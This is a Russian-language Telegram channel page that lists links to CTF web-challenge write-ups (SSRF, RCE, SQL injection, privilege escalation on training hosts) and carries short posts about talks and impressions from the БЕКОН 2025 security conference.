- [web-1-2] Локальное повышение привилегий (LPE) на узле library.edu.stf

➡️Райтап
[/channel/writeup_ctf/225]

🗂️Задание
- [web-3-1] Подделка запроса со стороны сервера (SSRF) на узле utils.edu.stf

➡️Райтап
[/channel/writeup_ctf/265]

- [web-3-2] Удаленное выполнение кода (RCE) на узле utils.edu.stf

➡️Райтап
[/channel/writeup_ctf/264]

🗂️Задание
- [web-4] Удаленное выполнение кода (RCE) на узле shop.edu.stf

➡️Райтап
[/channel/writeup_ctf/282]

🗂️Задание
- [web-5] Внедрение SQL-кода (SQLi) на узле tokenizer.edu.stf

➡️Райтап
[/channel/writeup_ctf/233]

🗂️Задание
- [web-6] Удаленное выполнение кода (RCE) на узле smashmusic.edu.stf

➡️Райтап
[/channel/writeup_ctf/450]

БОНУС: райтапы на категорию #infra
[/channel/writeup_ctf/282]

💬 Канал & Чат | 📺 RUTUBE | 📺 writeup_ctf?si=TX1b4ep75lAYIh7a">YouTube

Читать полностью…

Похек

БЕКОН 2025

🌚 @poxek

Читать полностью…

Похек

Михаил Кожуховский, Flowmaster. "Чем собирать контейнеры если вы параноик?".

Читать полностью…

Похек

Продолжаем! Альмир Сарваров, Банк ДомРФ. "Тонкая настройка безопасности OS Linux для контейнеров: вредно и полезно"

Читать полностью…

Похек

БЕКОН 2025

Хорошая локация, даже тут знакомых встретил)

Что очень удобно, 1 трек и не надо никуда бегать за докладчиками.

На удивление довольно много людей, но в целом какой-то толпучки нет, стенды удобно расставлены.

Классный мерч в большинстве, возьму себе пару идей на вооружение)
А еще стащил кучу стикеров, которые буду вам раздавать на мероприятиях, которую буду посещать))

Читать полностью…
Subscribe to a channel